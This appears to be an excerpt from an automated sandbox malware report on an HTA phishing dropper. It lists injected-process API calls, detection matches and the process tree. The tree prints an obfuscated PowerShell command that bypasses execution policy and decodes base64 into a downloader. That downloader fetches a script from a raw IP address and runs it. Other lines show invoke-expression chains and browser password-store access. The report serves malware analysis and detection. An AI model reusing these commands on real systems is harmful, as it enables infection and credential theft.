                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2C60 NtCreateKey,12_2_017C2C60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2C00 NtQueryInformationProcess,12_2_017C2C00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2CF0 NtOpenProcess,12_2_017C2CF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2CC0 NtQueryVirtualMemory,12_2_017C2CC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2CA0 NtQueryInformationToken,12_2_017C2CA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2F60 NtCreateProcessEx,12_2_017C2F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2F30 NtCreateSection,12_2_017C2F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2FE0 NtCreateFile,12_2_017C2FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2FB0 NtResumeThread,12_2_017C2FB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2FA0 NtQuerySection,12_2_017C2FA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2F90 NtProtectVirtualMemory,12_2_017C2F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2E30 NtWriteVirtualMemory,12_2_017C2E30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2EE0 NtQueueApcThread,12_2_017C2EE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2EA0 NtAdjustPrivilegesToken,12_2_017C2EA0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017C2E80 NtReadVirtualMemory,12_2_017C2E80
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E835C0 NtCreateMutant,LdrInitializeThunk,16_2_04E835C0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E84650 NtSuspendThread,LdrInitializeThunk,16_2_04E84650
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E84340 NtSetContextThread,LdrInitializeThunk,16_2_04E84340
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82CA0 NtQueryInformationToken,LdrInitializeThunk,16_2_04E82CA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82C60 NtCreateKey,LdrInitializeThunk,16_2_04E82C60
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82C70 NtFreeVirtualMemory,LdrInitializeThunk,16_2_04E82C70
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82DF0 NtQuerySystemInformation,LdrInitializeThunk,16_2_04E82DF0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82DD0 NtDelayExecution,LdrInitializeThunk,16_2_04E82DD0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82D30 NtUnmapViewOfSection,LdrInitializeThunk,16_2_04E82D30
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82D10 NtMapViewOfSection,LdrInitializeThunk,16_2_04E82D10
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82EE0 NtQueueApcThread,LdrInitializeThunk,16_2_04E82EE0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82E80 NtReadVirtualMemory,LdrInitializeThunk,16_2_04E82E80
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82FE0 NtCreateFile,LdrInitializeThunk,16_2_04E82FE0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82FB0 NtResumeThread,LdrInitializeThunk,16_2_04E82FB0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82F30 NtCreateSection,LdrInitializeThunk,16_2_04E82F30
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E839B0 NtGetContextThread,LdrInitializeThunk,16_2_04E839B0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82AF0 NtWriteFile,LdrInitializeThunk,16_2_04E82AF0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82AD0 NtReadFile,LdrInitializeThunk,16_2_04E82AD0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82BE0 NtQueryValueKey,LdrInitializeThunk,16_2_04E82BE0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_04E82BF0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82BA0 NtEnumerateValueKey,LdrInitializeThunk,16_2_04E82BA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82B60 NtClose,LdrInitializeThunk,16_2_04E82B60
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E83090 NtSetValueKey,16_2_04E83090
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E83010 NtOpenDirectoryObject,16_2_04E83010
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82CF0 NtOpenProcess,16_2_04E82CF0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82CC0 NtQueryVirtualMemory,16_2_04E82CC0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82C00 NtQueryInformationProcess,16_2_04E82C00
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82DB0 NtEnumerateKey,16_2_04E82DB0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E83D70 NtOpenThread,16_2_04E83D70
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82D00 NtSetInformationFile,16_2_04E82D00
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E83D10 NtOpenProcessToken,16_2_04E83D10
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82EA0 NtAdjustPrivilegesToken,16_2_04E82EA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82E30 NtWriteVirtualMemory,16_2_04E82E30
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82FA0 NtQuerySection,16_2_04E82FA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82F90 NtProtectVirtualMemory,16_2_04E82F90
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82F60 NtCreateProcessEx,16_2_04E82F60
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82AB0 NtWaitForSingleObject,16_2_04E82AB0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E82B80 NtQueryInformationFile,16_2_04E82B80
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EC9660 NtCreateFile,16_2_02EC9660
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EC97D0 NtReadFile,16_2_02EC97D0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EC9AC0 NtAllocateVirtualMemory,16_2_02EC9AC0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EC98C0 NtDeleteFile,16_2_02EC98C0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EC9960 NtClose,16_2_02EC9960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01790E5912_2_01790E59
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184EEDB12_2_0184EEDB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0184EE2612_2_0184EE26
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_01799EB012_2_01799EB0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_017A2E9012_2_017A2E90
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EFE4F616_2_04EFE4F6
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E4146016_2_04E41460
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0244616_2_04F02446
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0F43F16_2_04F0F43F
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EED5B016_2_04EED5B0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F1059116_2_04F10591
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0757116_2_04F07571
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5053516_2_04E50535
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6C6E016_2_04E6C6E0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F016CC16_2_04F016CC
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E4C7C016_2_04E4C7C0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0F7B016_2_04F0F7B0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5077016_2_04E50770
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E7475016_2_04E74750
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0F0E016_2_04F0F0E0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F070E916_2_04F070E9
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EFF0CC16_2_04EFF0CC
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E570C016_2_04E570C0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F081CC16_2_04F081CC
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5B1B016_2_04E5B1B0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F101AA16_2_04F101AA
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E8516C16_2_04E8516C
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E3F17216_2_04E3F172
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F1B16B16_2_04F1B16B
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E4010016_2_04E40100
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EEA11816_2_04EEA118
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EF12ED16_2_04EF12ED
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6B2C016_2_04E6B2C0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E552A016_2_04E552A0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EF027416_2_04EF0274
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5E3F016_2_04E5E3F0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F103E616_2_04F103E6
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E9739A16_2_04E9739A
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0A35216_2_04F0A352
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E3D34C16_2_04E3D34C
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0132D16_2_04F0132D
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0FCF216_2_04F0FCF2
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E40CF216_2_04E40CF2
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EF0CB516_2_04EF0CB5
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EC9C3216_2_04EC9C32
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E50C0016_2_04E50C00
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E4ADE016_2_04E4ADE0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6FDC016_2_04E6FDC0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E68DBF16_2_04E68DBF
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F07D7316_2_04F07D73
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E53D4016_2_04E53D40
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F01D5A16_2_04F01D5A
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5AD0016_2_04E5AD00
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0EEDB16_2_04F0EEDB
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E59EB016_2_04E59EB0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0CE9316_2_04F0CE93
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E62E9016_2_04E62E90
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E50E5916_2_04E50E59
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0EE2616_2_04F0EE26
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5CFE016_2_04E5CFE0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E42FC816_2_04E42FC8
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0FFB116_2_04F0FFB1
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E51F9216_2_04E51F92
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EC4F4016_2_04EC4F40
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E92F2816_2_04E92F28
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E70F3016_2_04E70F30
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0FF0916_2_04F0FF09
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E538E016_2_04E538E0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E7E8F016_2_04E7E8F0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E368B816_2_04E368B8
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5284016_2_04E52840
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5A84016_2_04E5A840
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E529A016_2_04E529A0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F1A9A616_2_04F1A9A6
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6696216_2_04E66962
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E5995016_2_04E59950
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6B95016_2_04E6B950
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EFDAC616_2_04EFDAC6
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EEDAAC16_2_04EEDAAC
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E95AA016_2_04E95AA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E4EA8016_2_04E4EA80
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04EC3A6C16_2_04EC3A6C
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F07A4616_2_04F07A46
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0FA4916_2_04F0FA49
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E8DBF916_2_04E8DBF9
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F06BD716_2_04F06BD7
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04E6FB8016_2_04E6FB80
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0FB7616_2_04F0FB76
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04F0AB4016_2_04F0AB40
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB220016_2_02EB2200
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAD34016_2_02EAD340
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAB32016_2_02EAB320
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAD12016_2_02EAD120
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAB46616_2_02EAB466
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EAB47016_2_02EAB470
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB3AA016_2_02EB3AA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB3A9B16_2_02EB3A9B
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02EB58A016_2_02EB58A0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_02ECBFA016_2_02ECBFA0
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1E68E16_2_04D1E68E
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1D75816_2_04D1D758
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1E1D816_2_04D1E1D8
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: 16_2_04D1E2F716_2_04D1E2F7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0177B970 appears 266 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 017D7E54 appears 88 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 017C5130 appears 36 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 0180F290 appears 105 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: String function: 017FEA12 appears 84 times
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04E3B970 appears 266 times
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04E97E54 appears 88 times
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04EBEA12 appears 84 times
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04ECF290 appears 105 times
                      Source: C:\Windows\SysWOW64\msinfo32.exeCode function: String function: 04E85130 appears 36 times
                      Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: Process Memory Space: powershell.exe PID: 6364, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winHTA@23/17@4/5
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\nightridingisreallyniceforworkingskillentiretimefornew[1].tiff
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6704:120:WilError_03
                      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ujoxousr.3r0.ps1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS"
                      Source: C:\Windows\SysWOW64\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: msinfo32.exe, 00000010.00000003.2302605762.0000000003068000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2656376865.00000000030B9000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2305913626.0000000003095000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000002.2656376865.0000000003089000.00000004.00000020.00020000.00000000.sdmp, msinfo32.exe, 00000010.00000003.2302767117.0000000003089000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: bestimylover.hta ReversingLabs: Detection: 18%
                      Source: unknown Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\bestimylover.hta"
                      Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'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'+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwersHeLL -ex bYpASS -NoP -w 1 -c DeVIceCrEDeNTIALDEPLOyMent ; iNvoKe-EXpRESSioN($(inVoKe-ExPRESsIOn('[sySTEm.teXT.eNcoDIng]'+[chaR]0x3A+[ChAR]58+'uTF8.GEtSTriNg([SysTeM.CoNVERt]'+[cHar]58+[CHAr]58+'fROMBaSE64STRiNG('+[ChAr]0x22+'JDM4TDVlalpXSUdyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRlRklOSXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVUkxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZ3JKcHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBOQSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1NeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBWY09oeUxjTkloVSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNJTnQpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiUGV6TWJGd0JaZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU1BBQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpGY3FXayAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDM4TDVlalpXSUdyOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3Mi40NC4xNzUvMjQ0L25pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm5ldy50aUZGIiwiJGVuVjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIiwwLDApO3NUQXJ0LXNMZWVwKDMpO0lJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pZ2h0cmlkaW5naXNyZWFsbHluaWNlZm9yd29ya2luZ3NraWxsZW50aXJldGltZWZvcm4udmJTIg=='+[cHAr]34+'))')))"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hfoj0pnm\hfoj0pnm.cmdline"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES66CD.tmp" "c:\Users\user\AppData\Local\Temp\hfoj0pnm\CSC102A1040D3F84A7CBD6AF35F51E7FDEF.TMP"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nightridingisreallyniceforworkingskillentiretimeforn.vbS"
                      Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $familial = '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';$monophthongs = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($familial));Invoke-Expression $monophthongs
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                      Source: C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe Process created: C:\Windows\SysWOW64\msinfo32.exe "C:\Windows\SysWOW64\msinfo32.exe"
                      Source: C:\Windows\SysWOW64\msinfo32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: mshtml.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: wkscli.dll
                      Source: C:\Windows\SysWOW64\mshta.exe Section loaded: netutils.dll
